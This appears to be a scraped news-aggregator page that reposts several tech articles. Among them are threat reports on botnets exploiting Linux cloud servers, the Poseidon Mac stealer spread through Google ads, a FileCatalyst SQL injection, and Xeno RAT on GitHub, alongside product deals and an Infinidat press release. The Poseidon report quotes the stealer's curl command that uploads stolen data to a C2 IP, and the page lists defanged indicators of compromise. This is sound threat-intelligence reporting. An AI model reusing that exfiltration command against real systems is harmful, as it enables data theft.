Hackers Attacking Linux Cloud Servers To Gain Control And Storage

andreasc
-
0
Hackers Attacking Linux Cloud Servers To Gain Control And Storage
[ad_1]

Malware storage, distribution, and command and control (C2) operations are increasingly being used to leverage cloud services for recent cybersecurity threats. 

But, this complicates the detection process and all the prevention efforts. 

Security researchers at FortiGuard Labs have recently observed that the botnets like UNSTABLE and Condi have been actively exploiting the Linux cloud platforms to gain control and storage. 

Hackers Attacking Linux Servers

Moreover, threat actors are also targeting various devices and systems, including JAWS webservers, Dasan GPON and Huawei HG532 routers, TP-Link Archer AX21, and Ivanti Connect Secure, by exploiting multiple vulnerabilities to strengthen their attacks.

Scan Your Business Email Inbox to Find Advanced Email Threats - Try AI-Powered Free Threat Scan

JAWS Webserver RCE vulnerability (CVE-2016-20016) is the starting access point of UNSTABLE Botnet, which is a Mirai variant that downloads downloader script from a particular IP.

Attack flow (Source – Fortinet)

The botnet contains three main modules: scanner, DDoS attack, and exploitation. It scans for several vulnerabilities and brute-forces using hard-coded credentials; it also has nine methods to attack using DDoS techniques.

This botnet’s configuration is XOR-encoded, and it supports thirteen architectures.

The choice of attack techniques is determined by the commands issued by the C2 server, which helps demonstrate how versatile the botnet is and its potential impact.

Infecting devices to distribute malware from trembolone.zapto.org (45.128.232.90) by the Condi DDoS botnet result from CVE-2023-1389 being exploited.

FortiGuard Labs revealed two main IP addresses, 45.128.232.229 (attack source and C2 server) and 209.141.35.56 (malware storage). There are various DoS tools in use by the botnet for different Linux architectures.

The script connects to the C2 server, collects information on running processes, and transmits it back.

It seems that during this setup, separate malware storage was used in the cloud-based C2 infrastructure to check if a device could be infected before proceeding further with the infection stages.

Skibidi malware is based on two vulnerabilities, “CVE-2023-1389 in TP-Link Archer AX21″ and “CVE-2024-21887 in Ivanti Connect Secure.” It utilizes a script that pulls the right architecture for Linux to be attacked.

The malware sidesteps detection by employing tactics like process forking, string encoding, and process name manipulation.

The malware connects with the Command & Control (C2) server, watches system events occurring on it as well as sends itself reports back.

With this new breed of malware exploiting cloud services for its operations, it is clear that organizations need to step up their defenses against cloud-based threats.

To prevent such sophisticated cyber threats, multi-layered security mechanisms consisting of regular patches and network segmentation must be implemented.

IoCs

C2:-

  • 45[.]128[.]232[.]15
  • 45[.]128[.]232[.]90
  • 45[.]128[.]232[.]229
  • 45[.]128[.]232[.]234

URLs:-

  • hxxp://45[.]128[.]232[.]15
  • hxxp://45[.]128[.]232[.]90
  • hxxp://45[.]128[.]232[.]229
  • hxxp://209[.]141[.]35[.]56/getters
  • hxxp://45[.]128[.]232[.]234

Files:-

  • d5e81e9575dcdbbaa038a5b9251531d8beccedc93bd7d250a4bb2389c1615cd6
  • 6226e896850de8c5550b63481b138067582ebf361f7c5448d9d0596062150d89
  • 4c2dcd13685f24800b73856d1f3ec9a2c53c2b5480a9c10b73035a43df26c2e8
  • 31914b317ba6a44a9d3acb99979ec8c163bef8667b0ae41524e335847d70afb0
  • 5fbfc4c8204309e911d22d3b544773f8d4f9ab2edc71f8967bbdcce6cbc834ca
  • 53daa1e4c2f5c11a75989334c2a0227689509606aeda9d7ab11dd200ee6138c6
  • a9690df4542f28fc4e3b9161b9f8d685d4ce8753bfd9b1f5c8aacd6aa4bef873
  • fb86bb0863d15ac65a916979052220f755765eb0d5bc4c1c47e34762738d2311
  • cd05eaa2b01ec1a4880839628d1c6e3bed9045478cacbfb88f14d1937ccf667b
  • c88da56b348f8d89b5ab99a710de7131bdbc2f1dba4bb9809b1b3fd27322630e
  • 83a2608a93b643f68ab3dcfccf8de7b13394cc214a78fa59b6867e47fc56928c
  • 3660fbe90420f60664e68859de918a5c592dd33024f69bebff8bb77ab41b8fca
  • 75b594a20110e487e35ec4590a5211a425119cdf0fea6fcf030ee20cb548b7e5
  • ef2e57a5992d85ea2bfb5c5645f8b361dcd5c49eede38185a7b99ec00c287550
  • 2e69d9942a4c0d6d0294d038263f2d12f3a5f6aef8d72279b01e025d32addab2
  • 1a8508f62447e5ee624866b571a29cedc369d6ee8182782f32a75dcd58494d8c
  • 305e0eb9b815dddd40d73f4464946a0ec21866b7727e4fe073692bf82bb46936
  • 0092b27bee2df9536e8aff8948a1007ed1eb03f0e12e0348b72a113e7d4cb585
  • 65f2850892365a4d6bafc303ed04379bef3b41a85336e274f9348603105d2f37
  • c569eb7f33dcec3e6cdcfee7195202813fda6b7bf9ecb786a4a909d6745cbbff
  • 5110f8af13cdd872b904784d2aec75031c663baad01d68b5f05daa950d18ced3
  • eec122d6480803bcdd2c6906b0ae35bcffaf6bf5117dac8c7b2621f0b98b68ea
  • 9f14cdea1b41ac1c7251e3f2d4186e12d480d108942bc8f1f7bcac133ed88ccc
  • 5a0a8de050cc8ad2f9af41e4018b0317afc39c571f23bc9cfa115c6558205722
  • eb9ba3171a98dc543cbc599eb6ab9aa3a5a47cc6931afe511fa839c6a5fb889c
  • 1825c787c308d3cb1125d416025af8c8344a158f0a0b3467df6c0c875d2d8800
  • eb926f93bdd9b38d44d2239b4ec9c1d45762f850bee80cf9556b23372b6f0639
  • 8fb6110b2114e7786b1d4e7f600a08de0a25432417f863d9663d576a3c895e86
  • dc87ff82199cb60a8bcf59d4f8c0a706bf10051d0c15a911d37d1cda8fcf5f9e
  • 1816c473ba94f4740c0931e118d038ecb0733f8ffb7cbb74dedc7b78952f8318
  • d4dbd379f914ff5ba40c1aac1be37602e4cde687e47cfd7793cb10192617f4af
  • d034664f627af11bd2a34ba1b228b5a6841309caabfd72a731bbd4724d947e27
  • 4cc2110f89afac1de0c1989d0af07f8879003cac0803660f37cf394a0027db69
  • bd42e67e6238dfec0b7786797733c54ae1d92fe0e883758dddea779e113b5271
  • bd42e67e6238dfec0b7786797733c54ae1d92fe0e883758dddea779e113b5271
  • e758c4428a590519a281344a31f236146c996c784433fbe82eee009dd922516c
  • 3a3581da268d0fdb8c8027e261b682b07b6715c62fbf2c8aca301b7e8dd9d637
  • 6e21e400928f24630339441f6da0f3f1b66860bf480a9f5af20482878b686189
  • 8363ecc977d426f0e922abbeb4f1e8ed06397c0b6951dd75233016d3b5af58c
  • e511f5c8fc0bd713dc9b9742e8c682ba66177bb617e9118f84b150cf6ff4a07f
  • ddcb420c4141760feed2fc8c76425b72ab111d271385040c1446f6ab3993c6d7
  • 2b526e5ac01916d74e7aa88770102a8f34d4c57cea7a4e45c501331670635e26
  • 666eed520d2b430e1016eec555c0cd125912f9a8f7590d77c286eff52416fbaf
  • ba4229f5e44c378ae293b58139233a9bfbecbfd22fb51e05f74de38b186a071c
  • c376db6e6f6905113e7beb1f14d8e5a44b8374a959eefd0f5d25ab0f3cbabee2
  • ae999de92c369e53a3287ab034f2839367b44f7fd82d6ed56a5700c22ed44635
  • e94b6b99fae4dc8e5b0796c877ed01bf25f77ccab95fb43d24abed00e0f8a15a
  • 8fcb5c4c5306f3e7ffa2a47dedaddc108c77ef8ef48ec0980a0c441333e0a18b
  • 34f653119e418621c1cbfe7cf0614ea62e9a98dc345e4d7408eea96a08d3ac0d
  • a51333460fb711e0b172b6e4893d5bca6b9996f240b450fdaa5cbf14511c9e27
  • 90a43ca83efb2d460b86ff897b1bc657170b6c79c2c804610cdfca8f24adc71e
  • c5b6320925963ca6d5439dca7154c526c3a26500e204b48ff30a50c3a1b875ad
  • e7d87e68265a9a324d76759cca4f613c28c590b36490c8c65ee3d17918e5d3ec
  • 2867b3fd3c840aa9c868a88a5f6d417a09e4158f8209f0450a07eeb7e99ba4c8

Free Webinar! 3 Security Trends to Maximize MSP Growth -> Register For Free


[ad_2]
Source link

The Apple Watch SE (2nd Gen) can be yours for $189!

andreasc
-
0
The Apple Watch SE (2nd Gen) can be yours for $189!
[ad_1]

Amazon currently has the Apple Watch SE (2nd Gen) available for just $189. However, this is limited to a single colorway. That’s the 44mm size, with the Starlight watch case, and Starlight Sport Loop band. Others are on sale for $219, as is this one. However, this Starlight option does have a $19.01 coupon on the page, which brings it down to $199.99.

Currently, the Apple Watch SE (2nd Gen) is the cheapest Apple Watch that the company sells. It is a little over a year old at this point, but that is perfectly fine. Apple only just stopped support for the Series 3 and 4, while the SE (2nd Gen) came out with the Series 8. So it’ll continue to be supported for quite some time.

The Apple Watch SE is one of my favorite Apple Watches. I did use it for a few months before ultimately deciding to upgrade to the Apple Watch Ultra – huge upgrade, I know. The Apple Watch SE does a lot of great things at a pretty low price. Not only can it deliver notifications to your wrist, but you’ll also get Apple Pay and all kinds of health metrics.

Apple’s health measurements are pretty much the industry standard these days. The Watch SE is able to measure your heart rate from your wrist and is actually very accurate. This is surprising since measuring your heart rate that far from your heart is usually very inaccurate. However, scientific tests by companies that were not paid by Apple have shown it to be super accurate. Apple also included crash detection here, so when it detects that you might have been in a crash, you can quickly call for help. There’s sleep tracking, too, which, to be honest, leaves a bit to be desired. It really only works if you set a sleep schedule, unlike most of its competitors.

Now, on the flip side, there are some things here that are missing from something like the Apple Watch Series 9 (also on sale). Like the ability to take an ECG. There’s also no always-on display here, and the bottom of the watch is made of plastic versus glass. There’s just glass around the sensors. This does help to make it lighter, though the 40mm was already pretty light.

If you want to get into the Apple Watch world without spending a ton of cash, this is an excellent way to do just that.

Buy at Amazon


[ad_2]
Source link

YouTube is reportedly in talks with major music labels for AI-generated music

andreasc
-
0
YouTube is reportedly in talks with major music labels for AI-generated music
[ad_1]

Image credit — PhoneArena

YouTube, the popular video-sharing platform, is reportedly in talks with major music labels for permission to use more songs to create AI-generated music. This move appears to be part of YouTube’s broader strategy to compete with other companies in the AI music space, like OpenAI and Meta.The talks are said to be focused on securing licensing deals with Universal, Sony, and Warner. These deals would allow YouTube to use artists’ music for AI training in exchange for one-off payments. This move is notable because it comes just days after these same music labels filed lawsuits against AI music generators Udio and Suno for alleged copyright infringement.

YouTube has already experimented with AI-generated music through a tool called “Dream Track” for Shorts. This tool allowed a select group of creators to generate unique versions of songs in the style of various artists with their consent. YouTube now wants to expand its collection of artists and songs for AI music generation, but not necessarily for Dream Tracks.

Video Thumbnail

YouTube’s “Dream Track” experiment for Shorts launched in 2023 and involves AI music generation with the permission of a number of artists

The company’s interest in AI-generated music aligns with Google’s broader AI strategy. Google has already announced a Music AI Incubator in partnership with Universal Music Group and has published YouTube’s AI music principles, promising to “embrace it responsibly together with our music partners.”

However, the rise of AI-generated music has also raised concerns among musicians. Many artists worry about the potential threats AI poses to human creativity and fair compensation. An open letter signed by over 200 artists, including Billie Eilish and Stevie Wonder, denounced the use of AI in music, particularly when it involves training AI models with music without the artist’s consent.

Meanwhile, YouTube requires creators to label videos made with generative AI, or they risk facing penalties. Artists can also request the removal of AI-generated music uploaded without their permission. As licensing deals with AI companies are becoming increasingly common, it will be interesting to see how different platforms balance this new world of AI vs human creativity.

[ad_2]
Source link

Infinidat Revolutionizes Enterprise Cyber Storage Protection to Reduce Ransomware and Malware Threat Windows

andreasc
-
0
Infinidat Revolutionizes Enterprise Cyber Storage Protection to Reduce Ransomware and Malware Threat Windows
[ad_1]

Infinidat, a leading provider of enterprise storage solutions, has introduced a new automated cyber resiliency and recovery solution that will revolutionize how enterprises can minimize the impact of ransomware and malware attacks.

Infinidat’s InfiniSafe® Automated Cyber Protection (ACP) is a first-of-its-kind cybersecurity integration solution that is designed to reduce the threat window of cyberattacks, such as ransomware.

Sophisticated cyberattacks, including new sinister forms of AI-driven attacks, are increasingly targeting the data storage infrastructure of enterprises.

Infinidat’s InfiniSafe ACP enables enterprises to easily integrate with their Security Operations Centers (SOC), Security Information and Event Management (SIEM), Security Orchestration, Automation, and Response (SOAR) cybersecurity software applications, and simple syslog functions for less complex environments.

A security-related incident or event triggers immediate automated immutable snapshots of data, providing the ability to protect InfiniBox® and InfiniBox™ SSA block-based volumes and/or file systems and ensure near instantaneous cyber recovery.

“The merging of cybersecurity and data infrastructure has been compelling CIOs, CISOs and IT team leaders to rethink how to secure enterprise storage across hybrid multi-cloud deployments in light of increasing cyberattacks.

Enterprises need proactive strategies, seamless integration across IT domains, and the most advanced, automated technologies to stay ahead of cyber threats,” said Eric Herzog, CMO at Infinidat. Recognized as a cyber secure storage expert, Herzog is coming off participation in a string of cybersecurity panel discussions, roundtables and conference events.

“Infinidat has carved out a very unique leadership position as the only storage vendor to offer an automated enterprise storage cyber protection solution that seamlessly integrates with cyber security software applications,” said Chris Evans, Principal Analyst at Architecting IT.

“Infinidat’s newly launched InfiniSafe Automated Cyber Protection that easily meshes with the SIEM, SOAR or Security Operations Centers is exactly what enterprises need to include enterprise storage as a comprehensive approach to combat cyber threats.”

Infinidat’s new InfiniSafe ACP capability orchestrates the automatic taking of immutable snapshots of data, at the speed of compute, to stay ahead of cyberattacks by decisively cutting off the proliferation of data corruption.

Evans added, “This proactive cyber protection technique is extremely valuable, as it enables taking immediate immutable snapshots of data at the first sign of a potential cyberattack. This provides a significant advancement to ensure enterprise cyber storage resilience and recovery are integral to an enterprise’s cybersecurity strategy.

ACP enhances an enterprise’s overall cyber resilience by reducing the threat window and minimizing the impact of cyberattacks on enterprise storage environments.”

The InfiniSafe Automated Cyber Protection is one of the biggest innovations of the year in cybersecurity because it unlocks the full potential of an enterprise’s security posture and maximizes the investments that an enterprise has made in protecting the business.

By plugging into existing security mechanisms and continuous monitoring, InfiniSafe ACP bridges the gaps between enterprise storage and cybersecurity strategies that can transform the way CIOs and CISOs think about enterprise data infrastructures.                                                                      

Information technology leaders have identified this ability to automate data snapshot commands and data pathways as critical to early detection and worry-free cyber recovery that minimizes the effects of even the most vicious and deceptive cyberattacks of malicious actors.

An enterprise’s security team can put all its information from security operations through an enterprise storage intelligence grid to create the most sensitive triggers that often get missed by existing technologies and techniques.

Paul Rapier, VP of Information Technology at the Detroit Pistons, stated, “Infinidat’s efforts in enhancing cyber resilience for enterprises, particularly through the new InfiniSafe Automated Cyber Protection, are noteworthy for data security.”Allen Shahdadi, Vice President of Global Sales at Sycomp, said, “Infinidat has become synonymous with guaranteed cyber resilient storage.

Infinidat continues to deliver powerful solutions that solve critical cyber issues for enterprises and service providers around the globe. The InfiniSafe Automated Cyber Protection solution brings much needed capabilities to fight more effectively against cyberattacks.

The automatic capture of immutable snapshots of primary data could be the difference between your data being held ransom and the rapid recovery of your data. Before international cybercriminals, hackers and fraudsters can gain an advantage, Infinidat’s InfiniSafe reduces the threat window decisively.” 

The InfiniSafe Automated Cyber Protection solution is the latest in a string of cybersecurity capabilities that Infinidat has brought forward to strengthen enterprise storage in the face of constant threats of a tsunami of cyberattacks.

Infinidat has also unveiled the following extensions of its state-of-the-art cyber resilient capabilities:

  • InfiniSafe Cyber Detection for VMware – Access to InfiniSafe cyber resilience capabilities to combat cyberattacks has been expanded into VMware environments. The impact of a cyberattack can be readily determined through this cyber detection capability, with highly granular insights by leveraging AI and machine learning whether or not a VMware datastore and the VM’s they encompass have been compromised.
  • InfiniSafe Cyber Detection for InfiniGuard® – Cyber detection will be extended onto the InfiniGuard purpose-built backup appliance to help enterprises resist and quickly recover from cyberattacks. This proven capability provides highly intelligent scanning and indexing to identify signs of cyber threats in backup environments, helping ensure that data has integrity. The enhanced version will be available in 2H 2024.

As a leader in cyber resilient storage, Infinidat first unveiled its InfiniSafe software-based platform two years ago with a set of cybersecurity functions. This solution has won numerous awards and has been proven by large global enterprises.

The comprehensive cyber resilience capabilities of InfiniSafe technology improve the ability of an enterprise to combat and protect against ever-increasing cyberattacks and data breaches by uniquely combining immutable snapshots, logical air gapping, fenced/isolated networks, and virtually instantaneous data recovery into a single, high-performance platform.

The InfiniSafe ACP is the latest example of Infinidat’s broadening innovation. It was introduced alongside the launch of the InfiniBox G4 family of next-generation storage arrays for all-flash and hybrid configurations.

The G4 series is a completely new storage array family built from the ground up that substantially extends Infinidat’s cyber storage resilience and delivers up to 2.5x improvement in performance.

The InfiniBox G4 series introduces a new set of foundational elements, powered by InfuzeOS, which is Infinidat’s software defined storage operating system.

Webinar On Demand

To watch Infinidat’s end-user webinar about the new solutions − “The Future of Enterprise Storage, Cyber Security and Hybrid Multi-Cloud” – users can click here.

About Infinidat

Infinidat provides enterprises and service providers with a platform-native primary and secondary storage architecture that delivers comprehensive data services based on InfiniVerse®. This unique platform delivers outstanding IT operating benefits, support for modern workloads across on-premises and hybrid multi-cloud environments. Infinidat’s cyber resilient-by-design infrastructure, consumption-based performance, 100% availability, and cyber security guaranteed SLAs align with enterprise IT and business priorities. Infinidat’s award-winning platform-native data services and acclaimed white glove service are continuously recommended by customers, as recognized by Gartner® Peer Insights reviews. For more information: www.infinidat.com.

Connect with Infinidat

About Infinidat | Blog | Twitter | LinkedIn | Facebook | YouTube | Be our partner

Contact

Director of Global Communications
Sapna Capoor
Infinidat
[email protected]
+44 (0) 7789684159


[ad_2]
Source link

‘Poseidon’ Mac stealer distributed via Google ads

andreasc
-
0
‘Poseidon’ Mac stealer distributed via Google ads
[ad_1]

On June 24, we observed a new campaign distributing a stealer targeting Mac users via malicious Google ads for the Arc browser. This is the second time in the past couple of months where we see Arc being used as a lure, certainly a sign of its popularity. It was previously used to drop a Windows RAT, also via Google ads.

The macOS stealer being dropped in this latest campaign is actively being developed as an Atomic Stealer competitor, with a large part of its code base being the same as its predecessor. Malwarebytes was previously tracking this payload as OSX.RodStealer, in reference to its author, Rodrigo4. The threat actor rebranded the new project ‘Poseidon’ and added a few new features such as looting VPN configurations.

In this blog post, we review the advertisement of the new Poseidon campaign from the cyber crime forum announcement, to the distribution of the new Mac malware via malvertising.

Rodrigo4 launches new PR campaign

A threat actor known by his handle as Rodrigo4 in the XSS underground forum has been working on a stealer with similar features and code base as the notorious Atomic Stealer (AMOS). The service consists of a malware panel with statistics and a builder with custom name, icon and AppleScript. The stealer offers functionalities reminescent of Atomic Stealer including: file grabber, crypto wallet extractor, password manager (Bitwarden, KeePassXC) stealer, and browser data collector.

In a post last edited on Sunday, June 23, Rodrigo4 announced a new branding for their project:

Forum post by Rodrigo4 on XSS
Hello everyone, we have released the V4 update and there are quite a lot of new things.
The very first thing that catches your eye is the name of the project: Poseidon. Why is that? For PR management. In simple words, people didn’t know who we were.

Malware authors do need publicity, but we will try to stick to the facts and what we have observed in active malware delivery campaigns.

Distribution via Google ads

We saw an ad for the Arc browser belonging to ‘Coles & Co’, linking to the domain name arcthost[.]org:

Malicious ad for Arc browser via Google search

People who clicked on the ad were redirected to arc-download[.]com, a completely fake site offering Arc for Mac only:

Decoy website for Arc

The downloaded DMG file resembles what one would expect when installing a new Mac application with the exception of the right-click to open trick to bypass security protections:

Malicious Arc DMG installer

Connection to new Poseidon project

The new “Poseidon” stealer contains unfinished code that was seen by others, and also recently advertised to steal VPN configurations from Fortinet and OpenVPN:

Excerpt from forum post featuring new VPN capability

More interesting is the data exfiltration which is revealed in the following command:

set result_send to (do shell script \"curl -X POST -H \\\"uuid: 399122bdb9844f7d934631745e22bd06\\\" -H \\\"user: H1N1_Group\\\" -H \\\"buildid: id777\\\" --data-binary @/tmp/out.zip http:// 79.137.192[.]4/p2p\")

Navigating to this IP address reveals the new Poseidon branded panel:

Poseidon panel login page

Conclusion

There is an active scene for Mac malware development focused on stealers. As we can see in this post, there are many contributing factors to such a criminal enterprise. The vendor needs to convince potential customers that their product is feature-rich and has low detection from antivirus software.

Seeing campaigns distributing the new malware payload confirms that the threat is real and actively targeting new victims. Staying protected against these threats requires vigilance any time you download and install a new app.

Malwarebytes for Mac detects this this ‘Poseidon campaign as OSX.RodStealer and we have already shared information related to the malicious ad with Google. We highly recommend using web protection that blocks ads and malicious websites as your first line of defense. Malwarebytes Browser Guard does both effectively.

Indicators of Compromise

Google ad domain

arcthost[.]org

Decoy site

arc-download[.]com

Download URL

zestyahhdog[.]com/Arc12645413[.]dmg

Payload SHA256

c1693ee747e31541919f84dfa89e36ca5b74074044b181656d95d7f40af34a05

C2

79.137.192[.]4/p2p

[ad_2]
Source link

Ring Video Doorbell Plummets to $49.99: Amazon’s Biggest Discount Ever!

andreasc
-
0
Ring Video Doorbell Plummets to $49.99: Amazon’s Biggest Discount Ever!
[ad_1]

The Ring Video Doorbell seamlessly integrates with Amazon’s Alexa ecosystem, providing a comprehensive and convenient solution for monitoring your home’s entrance. With crystal-clear 1080p HD video and two-way audio communication, you can easily see and speak to visitors from anywhere using compatible devices like your Fire TV, Fire Tablet, or Echo Show. Alexa can even notify you when someone is at the door or when a package is delivered, enhancing your awareness and control.

With Ring Protect, you can store and share recorded videos and photos for as little as $3.99 per month per device or $10 for unlimited devices. This subscription enhances security by capturing and retaining valuable footage for future reference, ensuring you never miss a moment.

The Ring Video Doorbell’s battery life typically lasts around a month on a single charge, depending on factors like foot traffic and settings. However, its innovative Quick Release Battery feature makes swapping batteries effortless, minimizing downtime and maintaining continuous surveillance.

In addition to its impressive features and seamless integration, the Ring Video Doorbell offers the added benefit of deterring potential porch pirates. Allowing you to communicate with visitors remotely and record their every move creates a powerful deterrent against theft and enhances the overall security of your home.


[ad_2]
Source link

Fitbit users can now add American Express cards to Google Wallet

andreasc
-
0
Fitbit users can now add American Express cards to Google Wallet
[ad_1]

Image credit — PhoneArena

Fitbit users can now finally add American Express cards to their Google Wallet. This means that those who use Fitbit devices can now utilize their American Express cards for payments through Google Wallet. This feature has been long-awaited since Google replaced Fitbit Pay with Google Wallet, and it has now finally been rolled out as part of the Google Play Services v24.25 update.Previously, Google had mentioned the addition of American Express card support in an earlier update, but later retracted it. However, the feature has been reintroduced in the latest update, and users have reported successfully adding their American Express cards to their Fitbit devices. The official changelog for the update also confirms the addition of this feature.

In addition to American Express card support, the Google Play Services v24.25 update brings several other changes for Google Wallet users. These changes include:

  • The ability to add an e-wallet as a payment method or use linked e-wallets in Google Pay to complete payments on your phone.
  • New features for IDs added to Wallet on your phone.
  • The option to use Pixel as a payment method in Wallet on your phone.

The rollout of American Express card support for Fitbit devices is a significant development for users who have been eagerly awaiting this feature. It provides greater flexibility and convenience for those who prefer to use their American Express cards for payments. The additional changes included in the update further enhance the functionality of Google Wallet, making it a more versatile and comprehensive payment solution.

While Google has not officially confirmed the completion of the rollout, the reports of successful additions and the mention in the official changelog suggest that the feature is now widely available. This update is a welcome addition for Fitbit owners, who can now enjoy the convenience of using their American Express cards for payments on their devices.


[ad_2]
Source link

Poc Exploit Released-Fortra Filecatalyst SQL Injection Vulnerability

andreasc
-
0
Poc Exploit Released-Fortra Filecatalyst SQL Injection Vulnerability
[ad_1]

A Proof-of-Concept (PoC) exploit has been released for a critical SQL Injection vulnerability in Fortra FileCatalyst Workflow.

This vulnerability could potentially allow attackers to modify application data.

This vulnerability, CVE-2024-5276, affects all versions of Fortra FileCatalyst Workflow from 5.1.6 Build 135 and earlier.

The SQL Injection vulnerability, discovered on June 18, 2024, is classified under CWE-20 and CWE-89.

It indicates improper input validation and improper neutralization of special elements used in an SQL command.

The vulnerability has a CVSS v3.1 score of 9.8, reflecting its critical nature (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

This attack exploits target software that constructs SQL statements based on user input.

An attacker can craft input strings so that when the target software constructs SQL statements based on the input, the resulting SQL statement performs actions other than those the application intended.

This vulnerability results from the failure of the application to validate input appropriately.

Potential Impacts

This vulnerability’s likely impacts include creating administrative users and deleting or modifying data in the application database.

However, data exfiltration via SQL injection is not possible with this vulnerability.

Scan Your Business Email Inbox to Find Advanced Email Threats - Try AI-Powered Free Threat Scan

Successful unauthenticated exploitation requires a Workflow system with anonymous access enabled; otherwise, an authenticated user is needed.

The vulnerability affects all versions of FileCatalyst Workflow from 5.1.6 Build 135 and earlier.

Users of these versions are strongly advised to update their systems to the latest version to mitigate the risk.

Fortra has yet to release an official patch, but users should monitor the vendor’s advisories for updates.

The release of the PoC exploit for this critical SQL Injection vulnerability underscores the importance of timely updates and robust security practices.

Organizations using FileCatalyst Workflow should act swiftly to secure their systems against potential exploitation.

Free Webinar! 3 Security Trends to Maximize MSP Growth -> Register For Free


[ad_2]
Source link

Huawei sees AI smartphones taking 90% of the market by 2030

andreasc
-
0
Huawei sees AI smartphones taking 90% of the market by 2030
[ad_1]

AI is all over the place at the moment… as far as technology goes. It’s the current buzzword that is being used. Many smartphone OEMs have included plenty of AI features in their devices. The same goes for Huawei, who believes that AI smartphones will account for 90% of the market by 2030.

This was said by Huawei’s Executive Director and Chairman of the ICT Infrastructure Business Management Committee, Wang Tao. He said it during the keynote speech in Shanghai yesterday.

Huawei believes AI smartphones will take 90% of the market by 2030

He believes that AI-powered smartphones will account for 11% of shipments this year. That could reach the 90% level by 2030, though. He essentially sees the integration of LLMs and AI features becoming a standard for the industry.

Tao said the following: “We will soon see a huge boost to traffic from AI. At the same time, 5G-A networks will be able to provide higher speeds, lower latency, and greater capacity to meet the network demands of the AI ​​era”.

Many smartphones already offer such features and are considered ‘AI smartphones’. Apple joined the fray with the company’s iOS 18 announcement recently. Well, users still don’t have access to all that, at least not in the stable form. Still, they’ll get access in a couple of months.

Companies will be able to run more and more AI tasks locally

When it comes to AI features, your phones need to talk to the server that runs larger LLMs. So for some processes, that is necessary. Companies are expected to be able to do more and more such tasks on smartphones, natively, though. LLMs will be getting more efficient, and processors more powerful and capable in the AI sense.

So, it seems like the AI buzzword is here to stay. Companies likely won’t stop using it, though they may reshape it. Apple, for example, avoided using ‘AI’, and simply calls its features ‘Apple Intelligence’.


[ad_2]
Source link

Xeno RAT Attacking Users Via GitHub Repository And .gg Domains

andreasc
-
0
Xeno RAT Attacking Users Via GitHub Repository And .gg Domains
[ad_1]

Threat actors use RATs because they provide attackers with persistent access to compromised systems, enabling long-term espionage and exploitation.

North Korean hackers and other actors who target the gaming community are using free malware on GitHub called XenoRAT.

Hunt’s research team found it spreading through .gg domains and a GitHub repository that pretended to be Roblox scripting tools.

Xeno RAT Attacking Via GitHub

The ASEC division of AhnLab claimed it had evidence of a North Korea-related group employing Dropbox to send XenoRAT.

Scan Your Business Email Inbox to Find Advanced Email Threats - Try AI-Powered Free Threat Scan

Besides this, one investigator discovered the software in an open directory that the Kimsuky threat group probably controls.

An increasing risk like this uses crafty approaches to reach out to gamers and developers across platforms with numerous tricks.

On XenoRAT’s GitHub page, you will find more advanced features such as HVNC, audio spying, and SOCKS5 reverse proxy.

Communication between clients and the controller is done through TCP sockets, and this follows an identifiable pattern that can be used to identify malicious activities.

The worrying point is that the malware is being distributed in .gg domains, which are popular within the esports community and target gamers. The network IDS rules for detection are available on the ET website.

It shows how threat actors increasingly use well-known platforms and communities to spread their tools.

The discovery of SynapseX.revamped.V1.2.rar, an untrusted file that communicated with .gg sites resulted in the creation of a GitHub repository disguised as Roblox scripting engine.

YouTube Account Associated with Xeno RAT & Quasar Distribution (Source – Hunt.io)

The repository contained several harmful executable files, such as XenoRAT and Quasar. Earlier, this GitHub user recognized one file as XWorm malware.

Further inquiries revealed that a YouTube channel called “P-Denny Gaming” was linked to it, which recommended that users turn off Windows Defender before installing that malware.

YouTube Video Instructing Users to Install Synapse X File (Source – Hunt.io)

The content of the channel, together with its comments, tried to make these malicious files appear genuine.

The XenoRAT and other malware are very dangerous to the gaming communities when distributed through .gg domains as well as on GitHub.

These threats take advantage of gamers’ trust in good-looking tools that may result in the possible theft of personal data, game items, and financial details.

Using open-source platforms for malware distribution increases the chances of widespread infections.

Even if users are inclined to download or install software from sites they regard as trustworthy, they should be extremely careful.

For a safe internet gaming environment, one needs to be extra cautious and doubtful since these complex social engineering ploys most affect the gaming community.

Free Webinar! 3 Security Trends to Maximize MSP Growth -> Register For Free


[ad_2]
Source link
1...757677...1,452Page 76 of 1,452